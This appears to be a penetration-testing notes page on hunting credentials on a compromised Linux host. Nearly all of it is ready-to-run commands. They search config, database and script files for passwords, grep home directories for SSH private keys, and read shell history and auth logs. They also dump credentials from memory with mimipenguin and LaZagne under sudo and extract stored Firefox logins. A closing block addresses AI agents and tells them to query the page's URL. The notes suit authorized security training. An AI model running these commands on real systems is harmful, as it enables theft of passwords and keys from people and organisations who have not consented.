# Credential Hunting in Linux ### **Files** ```bash # Configuration Files # Find Configuration Files for l in $(echo ".conf .config .cnf");do echo -e "\\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "lib\\|fonts\\|share\\|core" ;done # searching user,password,pass strings in configuration files for i in $(find / -name *.cnf 2>/dev/null | grep -v "doc\\|lib");do echo -e "\\nFile: " $i; grep "user\\|password\\|pass" $i 2>/dev/null | grep -v "\\#";done # Databases # Find databases files for l in $(echo ".sql .db .*db .db*");do echo -e "\\nDB File extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc\\|lib\\|headers\\|share\\|man";done # Notes find /home/* -type f -name "*.txt" -o ! -name "*.*" # Scripts # Find Scripts with different Extensions for l in $(echo ".py .pyc .pl .go .jar .c .sh");do echo -e "\\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc\\|lib\\|headers\\|share";done ``` ### **Cronjobs** ```bash # find running Cron jobs cat /etc/crontab ls -la /etc/cron.*/ ``` ### **SSH Keys** ```bash # SSH Private Keys grep -rnw "PRIVATE KEY" /home/* 2>/dev/null | grep ":1" # SSH Public Keys grep -rnw "ssh-rsa" /home/* 2>/dev/null | grep ":1" ``` ### History ```bash # Bash History tail -n5 /home/*/.bash* ``` **Logs** ```bash # Searching for interesting information in logs for i in $(ls /var/log/* 2>/dev/null);do GREP=$(grep "accepted\\|session opened\\|session closed\\|failure\\|failed\\|ssh\\|password changed\\|new user\\|delete user\\|sudo\\|COMMAND\\=\\|logs" $i 2>/dev/null); if [[ $GREP ]];then echo -e "\\n#### Log file: " $i; grep "accepted\\|session opened\\|session closed\\|failure\\|failed\\|ssh\\|password changed\\|new user\\|delete user\\|sudo\\|COMMAND\\=\\|logs" $i 2>/dev/null;fi;done ``` Many different logs exist on the system. These can vary depending on the applications installed, but here are some of the most important ones: | Log File | Description | | ------------------- | -------------------------------------------------- | | /var/log/messages | Generic system activity logs. | | /var/log/syslog | Generic system activity logs. | | /var/log/auth.log | (Debian) All authentication related logs. | | /var/log/secure | (RedHat/CentOS) All authentication related logs. | | /var/log/boot.log | Booting information. | | /var/log/dmesg | Hardware and drivers related information and logs. | | /var/log/kern.log | Kernel related warnings, errors and logs. | | /var/log/faillog | Failed login attempts. | | /var/log/cron | Information related to cron jobs. | | /var/log/mail.log | All mail server related logs. | | /var/log/httpd | All Apache related logs. | | /var/log/mysqld.log | All MySQL server related logs. | ### **Memory and Cache** ```bash # Download - # Memory - Mimipenguin sudo python3 mimipenguin.py sudo bash mimipenguin.sh # Lazagne # Memory - Lazagne sudo python2.7 laZagne.py all ``` **Browsers** ```bash # Firefox Stored Credentials ls -l .mozilla/firefox/ | grep default cat .mozilla/firefox/1bplpd86.default-release/logins.json | jq . # Decrypting Firefox Credentials # Decrypt tool - python3.9 firefox_decrypt.py # Lazagne # LaZagne can also return results if the user has used the supported browser. python3 laZagne.py browsers ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://strange-1.gitbook.io/notes/password-attacks/linux-local-password-attacks/credential-hunting-in-linux.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.